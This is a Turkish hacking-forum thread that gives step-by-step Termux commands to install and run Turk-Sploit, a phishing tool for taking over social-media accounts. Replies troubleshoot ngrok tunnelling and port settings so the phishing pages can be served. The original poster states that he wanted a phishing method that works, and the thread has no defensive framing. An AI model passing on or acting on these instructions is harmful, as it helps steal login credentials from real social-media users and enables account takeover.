Termux Turk-Sploit kullanımı (Sosyal medya hackleme)

Endofrin

Katılımcı Üye
25 Şub 2019
253
2
Yupiter
Selam Aleykum arkadaşlar,ne zamandır işime yarıyacak bir phishing yöntemi arıyodum ve sonunda çalışan bi yöntem buldum çok uzatmadan konuya geçelim.

Kurulumu:
pkg install git
git clone https://github.com/yamanefkar/Turk-Sploit

Kurulum bitdikden sonra
cd Turk-Sploit diyoruz
ls deyip listeliyoruz
bash requirements.sh diyoruz
Kurulum bitdikden sonra yine
ls deyip listeliyoruz
bash tst.sh diyerek çalıştırıyoruz.

Şimdi size vereceğim videodakı kurulum hatalıdır, yani böyle kurarsanız ngrokdan link alamassınız reconnect de tıkanırsınız, siz ben dediğim gibi proqramı kurun, sadece videonu size verme sebebim kullanımını daha detaylı anlamanız için.. :)

Turk-Sploit Kullanımı :)

https://youtu.be/jgoRzp8at3U

Son düzenleme:

Patat3stt

Yeni üye
1 Mar 2019
27
0
Merhabalar ls dediğimde termuxtaki indirilen programları gösteriyor yani türk sploitin içindekilerini açmıyor
bash: requirements.sh: No such file or directory bu hatayı veriyor

Endofrin

Katılımcı Üye
25 Şub 2019
253
2
Yupiter
Patat3stt afedersin dostum iyiki bunu bana bildirdin çıkan konuya yeniden göz at değişiklik yaptım sayende önemli bi şeyi atladığımı fark etdim :)

Jusstthe

Katılımcı Üye
12 Ağu 2018
396
0
I S T
Hocam her şey tamam bash tst.sh dediğim zaman kırmızı renkle bir sürü kodlar çıkıyor ngrok server açmıyor yardım eder misiniz?

Endofrin

Katılımcı Üye
25 Şub 2019
253
2
Yupiter
Jusstthe hangi komuttan sonra bash tst.sh komutunu yazdiniz ? kurulumu benim dedigim gibi yaparsaniz olacaktir , ngrok sorunu yaşarsanız dosyayı termuxdan silip , yeniden ben yazdığım komutları yazarak kura bilirsiniz.

termuxdan dosya nasil silinir bilmiyosaniz izleyin :)

[ame]https://www.youtube.com/watch?v=CRavmzoDwEI[/ame]

Son düzenleme:

Endofrin

Katılımcı Üye
25 Şub 2019
253
2
Yupiter
abdullah078 nasil olmadi qardas :) anlatirsan yardimci ola bilirim , dedigim gibi kurarsan bence bir sorunla karsilasmassin :) ben shelllpshish , socialphish , hiddeneye ve s. denedim sorun cikmisdi ama bu kurulumla bir sorun cikmadi:)

Son düzenleme:

Endofrin

Katılımcı Üye
25 Şub 2019
253
2
Yupiter
abdullah078 qardas , 8080 portlari genellikle dolu oluyor hemde sen yalniz 80 yazarsan tabiiki calismaz portu 8080-den asagi vermelisin mesela 7070, 6565 ve s, termux sploit kullanimi bir az farkli oldugu icin kullanim videosun da asagi da verdim , hangisin denersen dene sorunun cozulur umarim :)

2031

Yeni üye
25 Şub 2019
21
0
Selamünaleyküm. git clone "link" yazıyorum username for github , passw for github falan diyor toolu kuramıyorum. Ne yapmam lazım ?

Son düzenleme:

`AJAX

Katılımcı Üye
21 Haz 2019
398
7
Linke basın sonra hata mesajı gerçek Turk-Sploit deyin arama sonucundan yapmayı deneyin ben 2 saattir link alamadim ins siz alırsınız k.g

TCシ︎FEARLESS

Yeni üye
19 Mar 2022
18
2
Selam Aleykum arkadaşlar,ne zamandır işime yarıyacak bir phishing yöntemi arıyodum ve sonunda çalışan bi yöntem buldum çok uzatmadan konuya geçelim.

Kurulumu:
pkg install git
git clone GitHub - yamanefkar/Turk-Sploit

Kurulum bitdikden sonra
cd Turk-Sploit diyoruz
ls deyip listeliyoruz
bash requirements.sh diyoruz
Kurulum bitdikden sonra yine
ls deyip listeliyoruz
bash tst.sh diyerek çalıştırıyoruz.

Şimdi size vereceğim videodakı kurulum hatalıdır, yani böyle kurarsanız ngrokdan link alamassınız reconnect de tıkanırsınız, siz ben dediğim gibi proqramı kurun, sadece videonu size verme sebebim kullanımını daha detaylı anlamanız için.. :)

Turk-Sploit Kullanımı :)

Port numarası istiyor onu nasıl bulucaz

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.